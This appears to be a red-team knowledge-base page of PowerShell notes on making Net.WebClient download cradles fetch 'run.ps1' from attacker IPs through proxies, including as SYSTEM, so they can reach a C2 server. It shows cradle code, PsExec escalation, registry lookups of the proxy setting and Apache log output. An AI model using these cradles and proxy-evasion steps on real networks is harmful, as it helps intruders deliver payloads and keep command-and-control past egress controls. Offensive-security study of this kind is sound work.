Malleum Knowledge Base

Powershell proxy

2 min read

Verify proxy settings with GetProxy method

[System.Net.WebRequest]::DefaultWebProxy.GetProxy("http://192.168.45.195/run.ps1")

Remove proxy settings dynamically


$wc = new-object system.net.WebClient
$wc.proxy = $null
$wc.DownloadString("http://192.168.119.120/run.ps1")

Verify User-Agent Modification

# Determine if the Net.WebClient download cradle can modify the User-Agent property
$wc = new-object system.net.WebClient
$wc.Headers.Add('User-Agent', "This is my agent, there is no one like it...")
$wc.DownloadString("http://192.168.119.120/run.ps1")

HTTP Request with Custom User-Agent

# Running the code will download the file and leave behind the User-Agent text in the Apache access logs
kali@kali:~$ sudo tail /var/log/apache2/access.log
...
192.168.120.12 - - [09/Jun/2020:08:32:57 -0400] "GET /run.ps1 HTTP/1.1" 304 182 "-" "This is my agent, there is no one like it..."

Opening a 32-bit PowerShell ISE prompt as SYSTEM

C:\Tools\Sysinternals> PsExec.exe -s -i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe

Basic Net.WebClient download cradle

$wc = new-object system.net.WebClient
$wc.DownloadString("http://192.168.119.120/run.ps1")

HTTP request bypassing the proxy server

kali@kali:~$ sudo tail /var/log/apache2/access.log
...
192.168.120.11 - - [09/Jun/2020:08:22:36 -0400] "GET /run.ps1 HTTP/1.1" 200 4360 "-" "-"

If the communications needs to be from the proxy this is problem to us.

Finding a user hive based on SID

$keys = Get-ChildItem 'HKU:\'
ForEach ($key in $keys) {if ($key.Name -like "*S-1-5-21-*") {$start = $key.Name.substring(10);break}}

Fetching the proxy settings from registry key

$proxyAddr=(Get-ItemProperty -Path "HKU:$start\Software\Microsoft\Windows\CurrentVersion\Internet Settings\").ProxyServer

Create and assign proxy object for the SYSTEM user

New-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS | Out-Null
$keys = Get-ChildItem 'HKU:\'
ForEach ($key in $keys) {if ($key.Name -like "*S-1-5-21-*") {$start = $key.Name.substring(10);break}}
$proxyAddr=(Get-ItemProperty -Path "HKU:$start\Software\Microsoft\Windows\CurrentVersion\Internet Settings\").ProxyServer
[system.net.webrequest]::DefaultWebProxy = new-object System.Net.WebProxy("http://$proxyAddr")
$wc = new-object system.net.WebClient
$wc.DownloadString("http://192.168.119.120/run2.ps1")

Apache access log entry after SYSTEM download cradle

kali@kali:~$ sudo tail /var/log/apache2/access.log
...
192.168.120.12 - - [09/Jun/2020:14:47:25 -0400] "GET /run2.ps1 HTTP/1.1" 304 182 "-" "-"

The HTTP request is routed through the proxy server and will allow our download cradle to call back to our C2 even when all traffic must go through the proxy.

Now our download cradle is versatile enough to handle communication through a proxy, even as SYSTEM.

Graph View

Backlinks